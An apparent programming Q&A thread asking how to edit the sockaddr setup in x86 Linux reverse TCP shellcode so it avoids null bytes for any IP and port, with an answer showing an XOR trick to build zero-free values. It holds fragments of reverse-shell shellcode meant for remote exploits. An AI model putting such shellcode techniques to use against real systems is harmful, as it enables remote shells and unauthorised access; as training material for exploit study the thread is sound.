# How to change the assembly in this shellcode for make it work with any IP and port?

Tags: c, linux, shell, sockets, networking

I have read this blog: https://www.rcesecurity.com/2014/07/slae-shell-reverse-tcp-shellcode-linux-x86/. In the complete shellcode, as you read it, I ask the guy who created that blog, he say:

> "keep in mind that your port or ip should not contain a \x00, which could break it. If your IP contains a zero like 192.168.0.1 or your port contains a zero like 80, the shellcode will likely fail when you use it with a remote exploit".

and I ask what IP and port can work with this shell code, he say:

> "all IPs and ports that do not contain a zero in their network byte-order representation. So 0x0101017f which is the network-byte order representation of 127.1.1.1 is fine. 0x100007f which would be 127.0.0.1 is not working".

So can anyone help me how to edit just one thing:

```
push 0x0101017f  ;sin_addr=127.1.1.1 (network byte order)
push word 0x3905 ;sin_port=1337 (network byte order)
inc ebx          
push word bx     ;sin_family=AF_INET (0x2)
mov ecx, esp     ;save pointer to sockaddr struct`
```

To make the the shellcode work with any IP address and port number?

Comment: I am not sure what your question is. Do you mean to avoid the restriction of not being allowed to have 0 bytes in the code?

Comment: i need help about change the assembly code in that shell. just that part post: push 0x0101017f  
push word 0x3905, the problem is that  assembly code can't make the shell work with any  ip and port.

Answer (score 2):

A simple approach is to create the value you need with a binary operation and two operands that don't contain any zero bytes. For example, to push the port number 0x5000 (port 80 in network byte order)

```
mov ax, 0x5101
xor ax, 0x0101
push ax            ; 0x5101 xor 0x0101 = 0x5000
```

Which operands to choose depends on the actual values you need, so I can't post a general solution.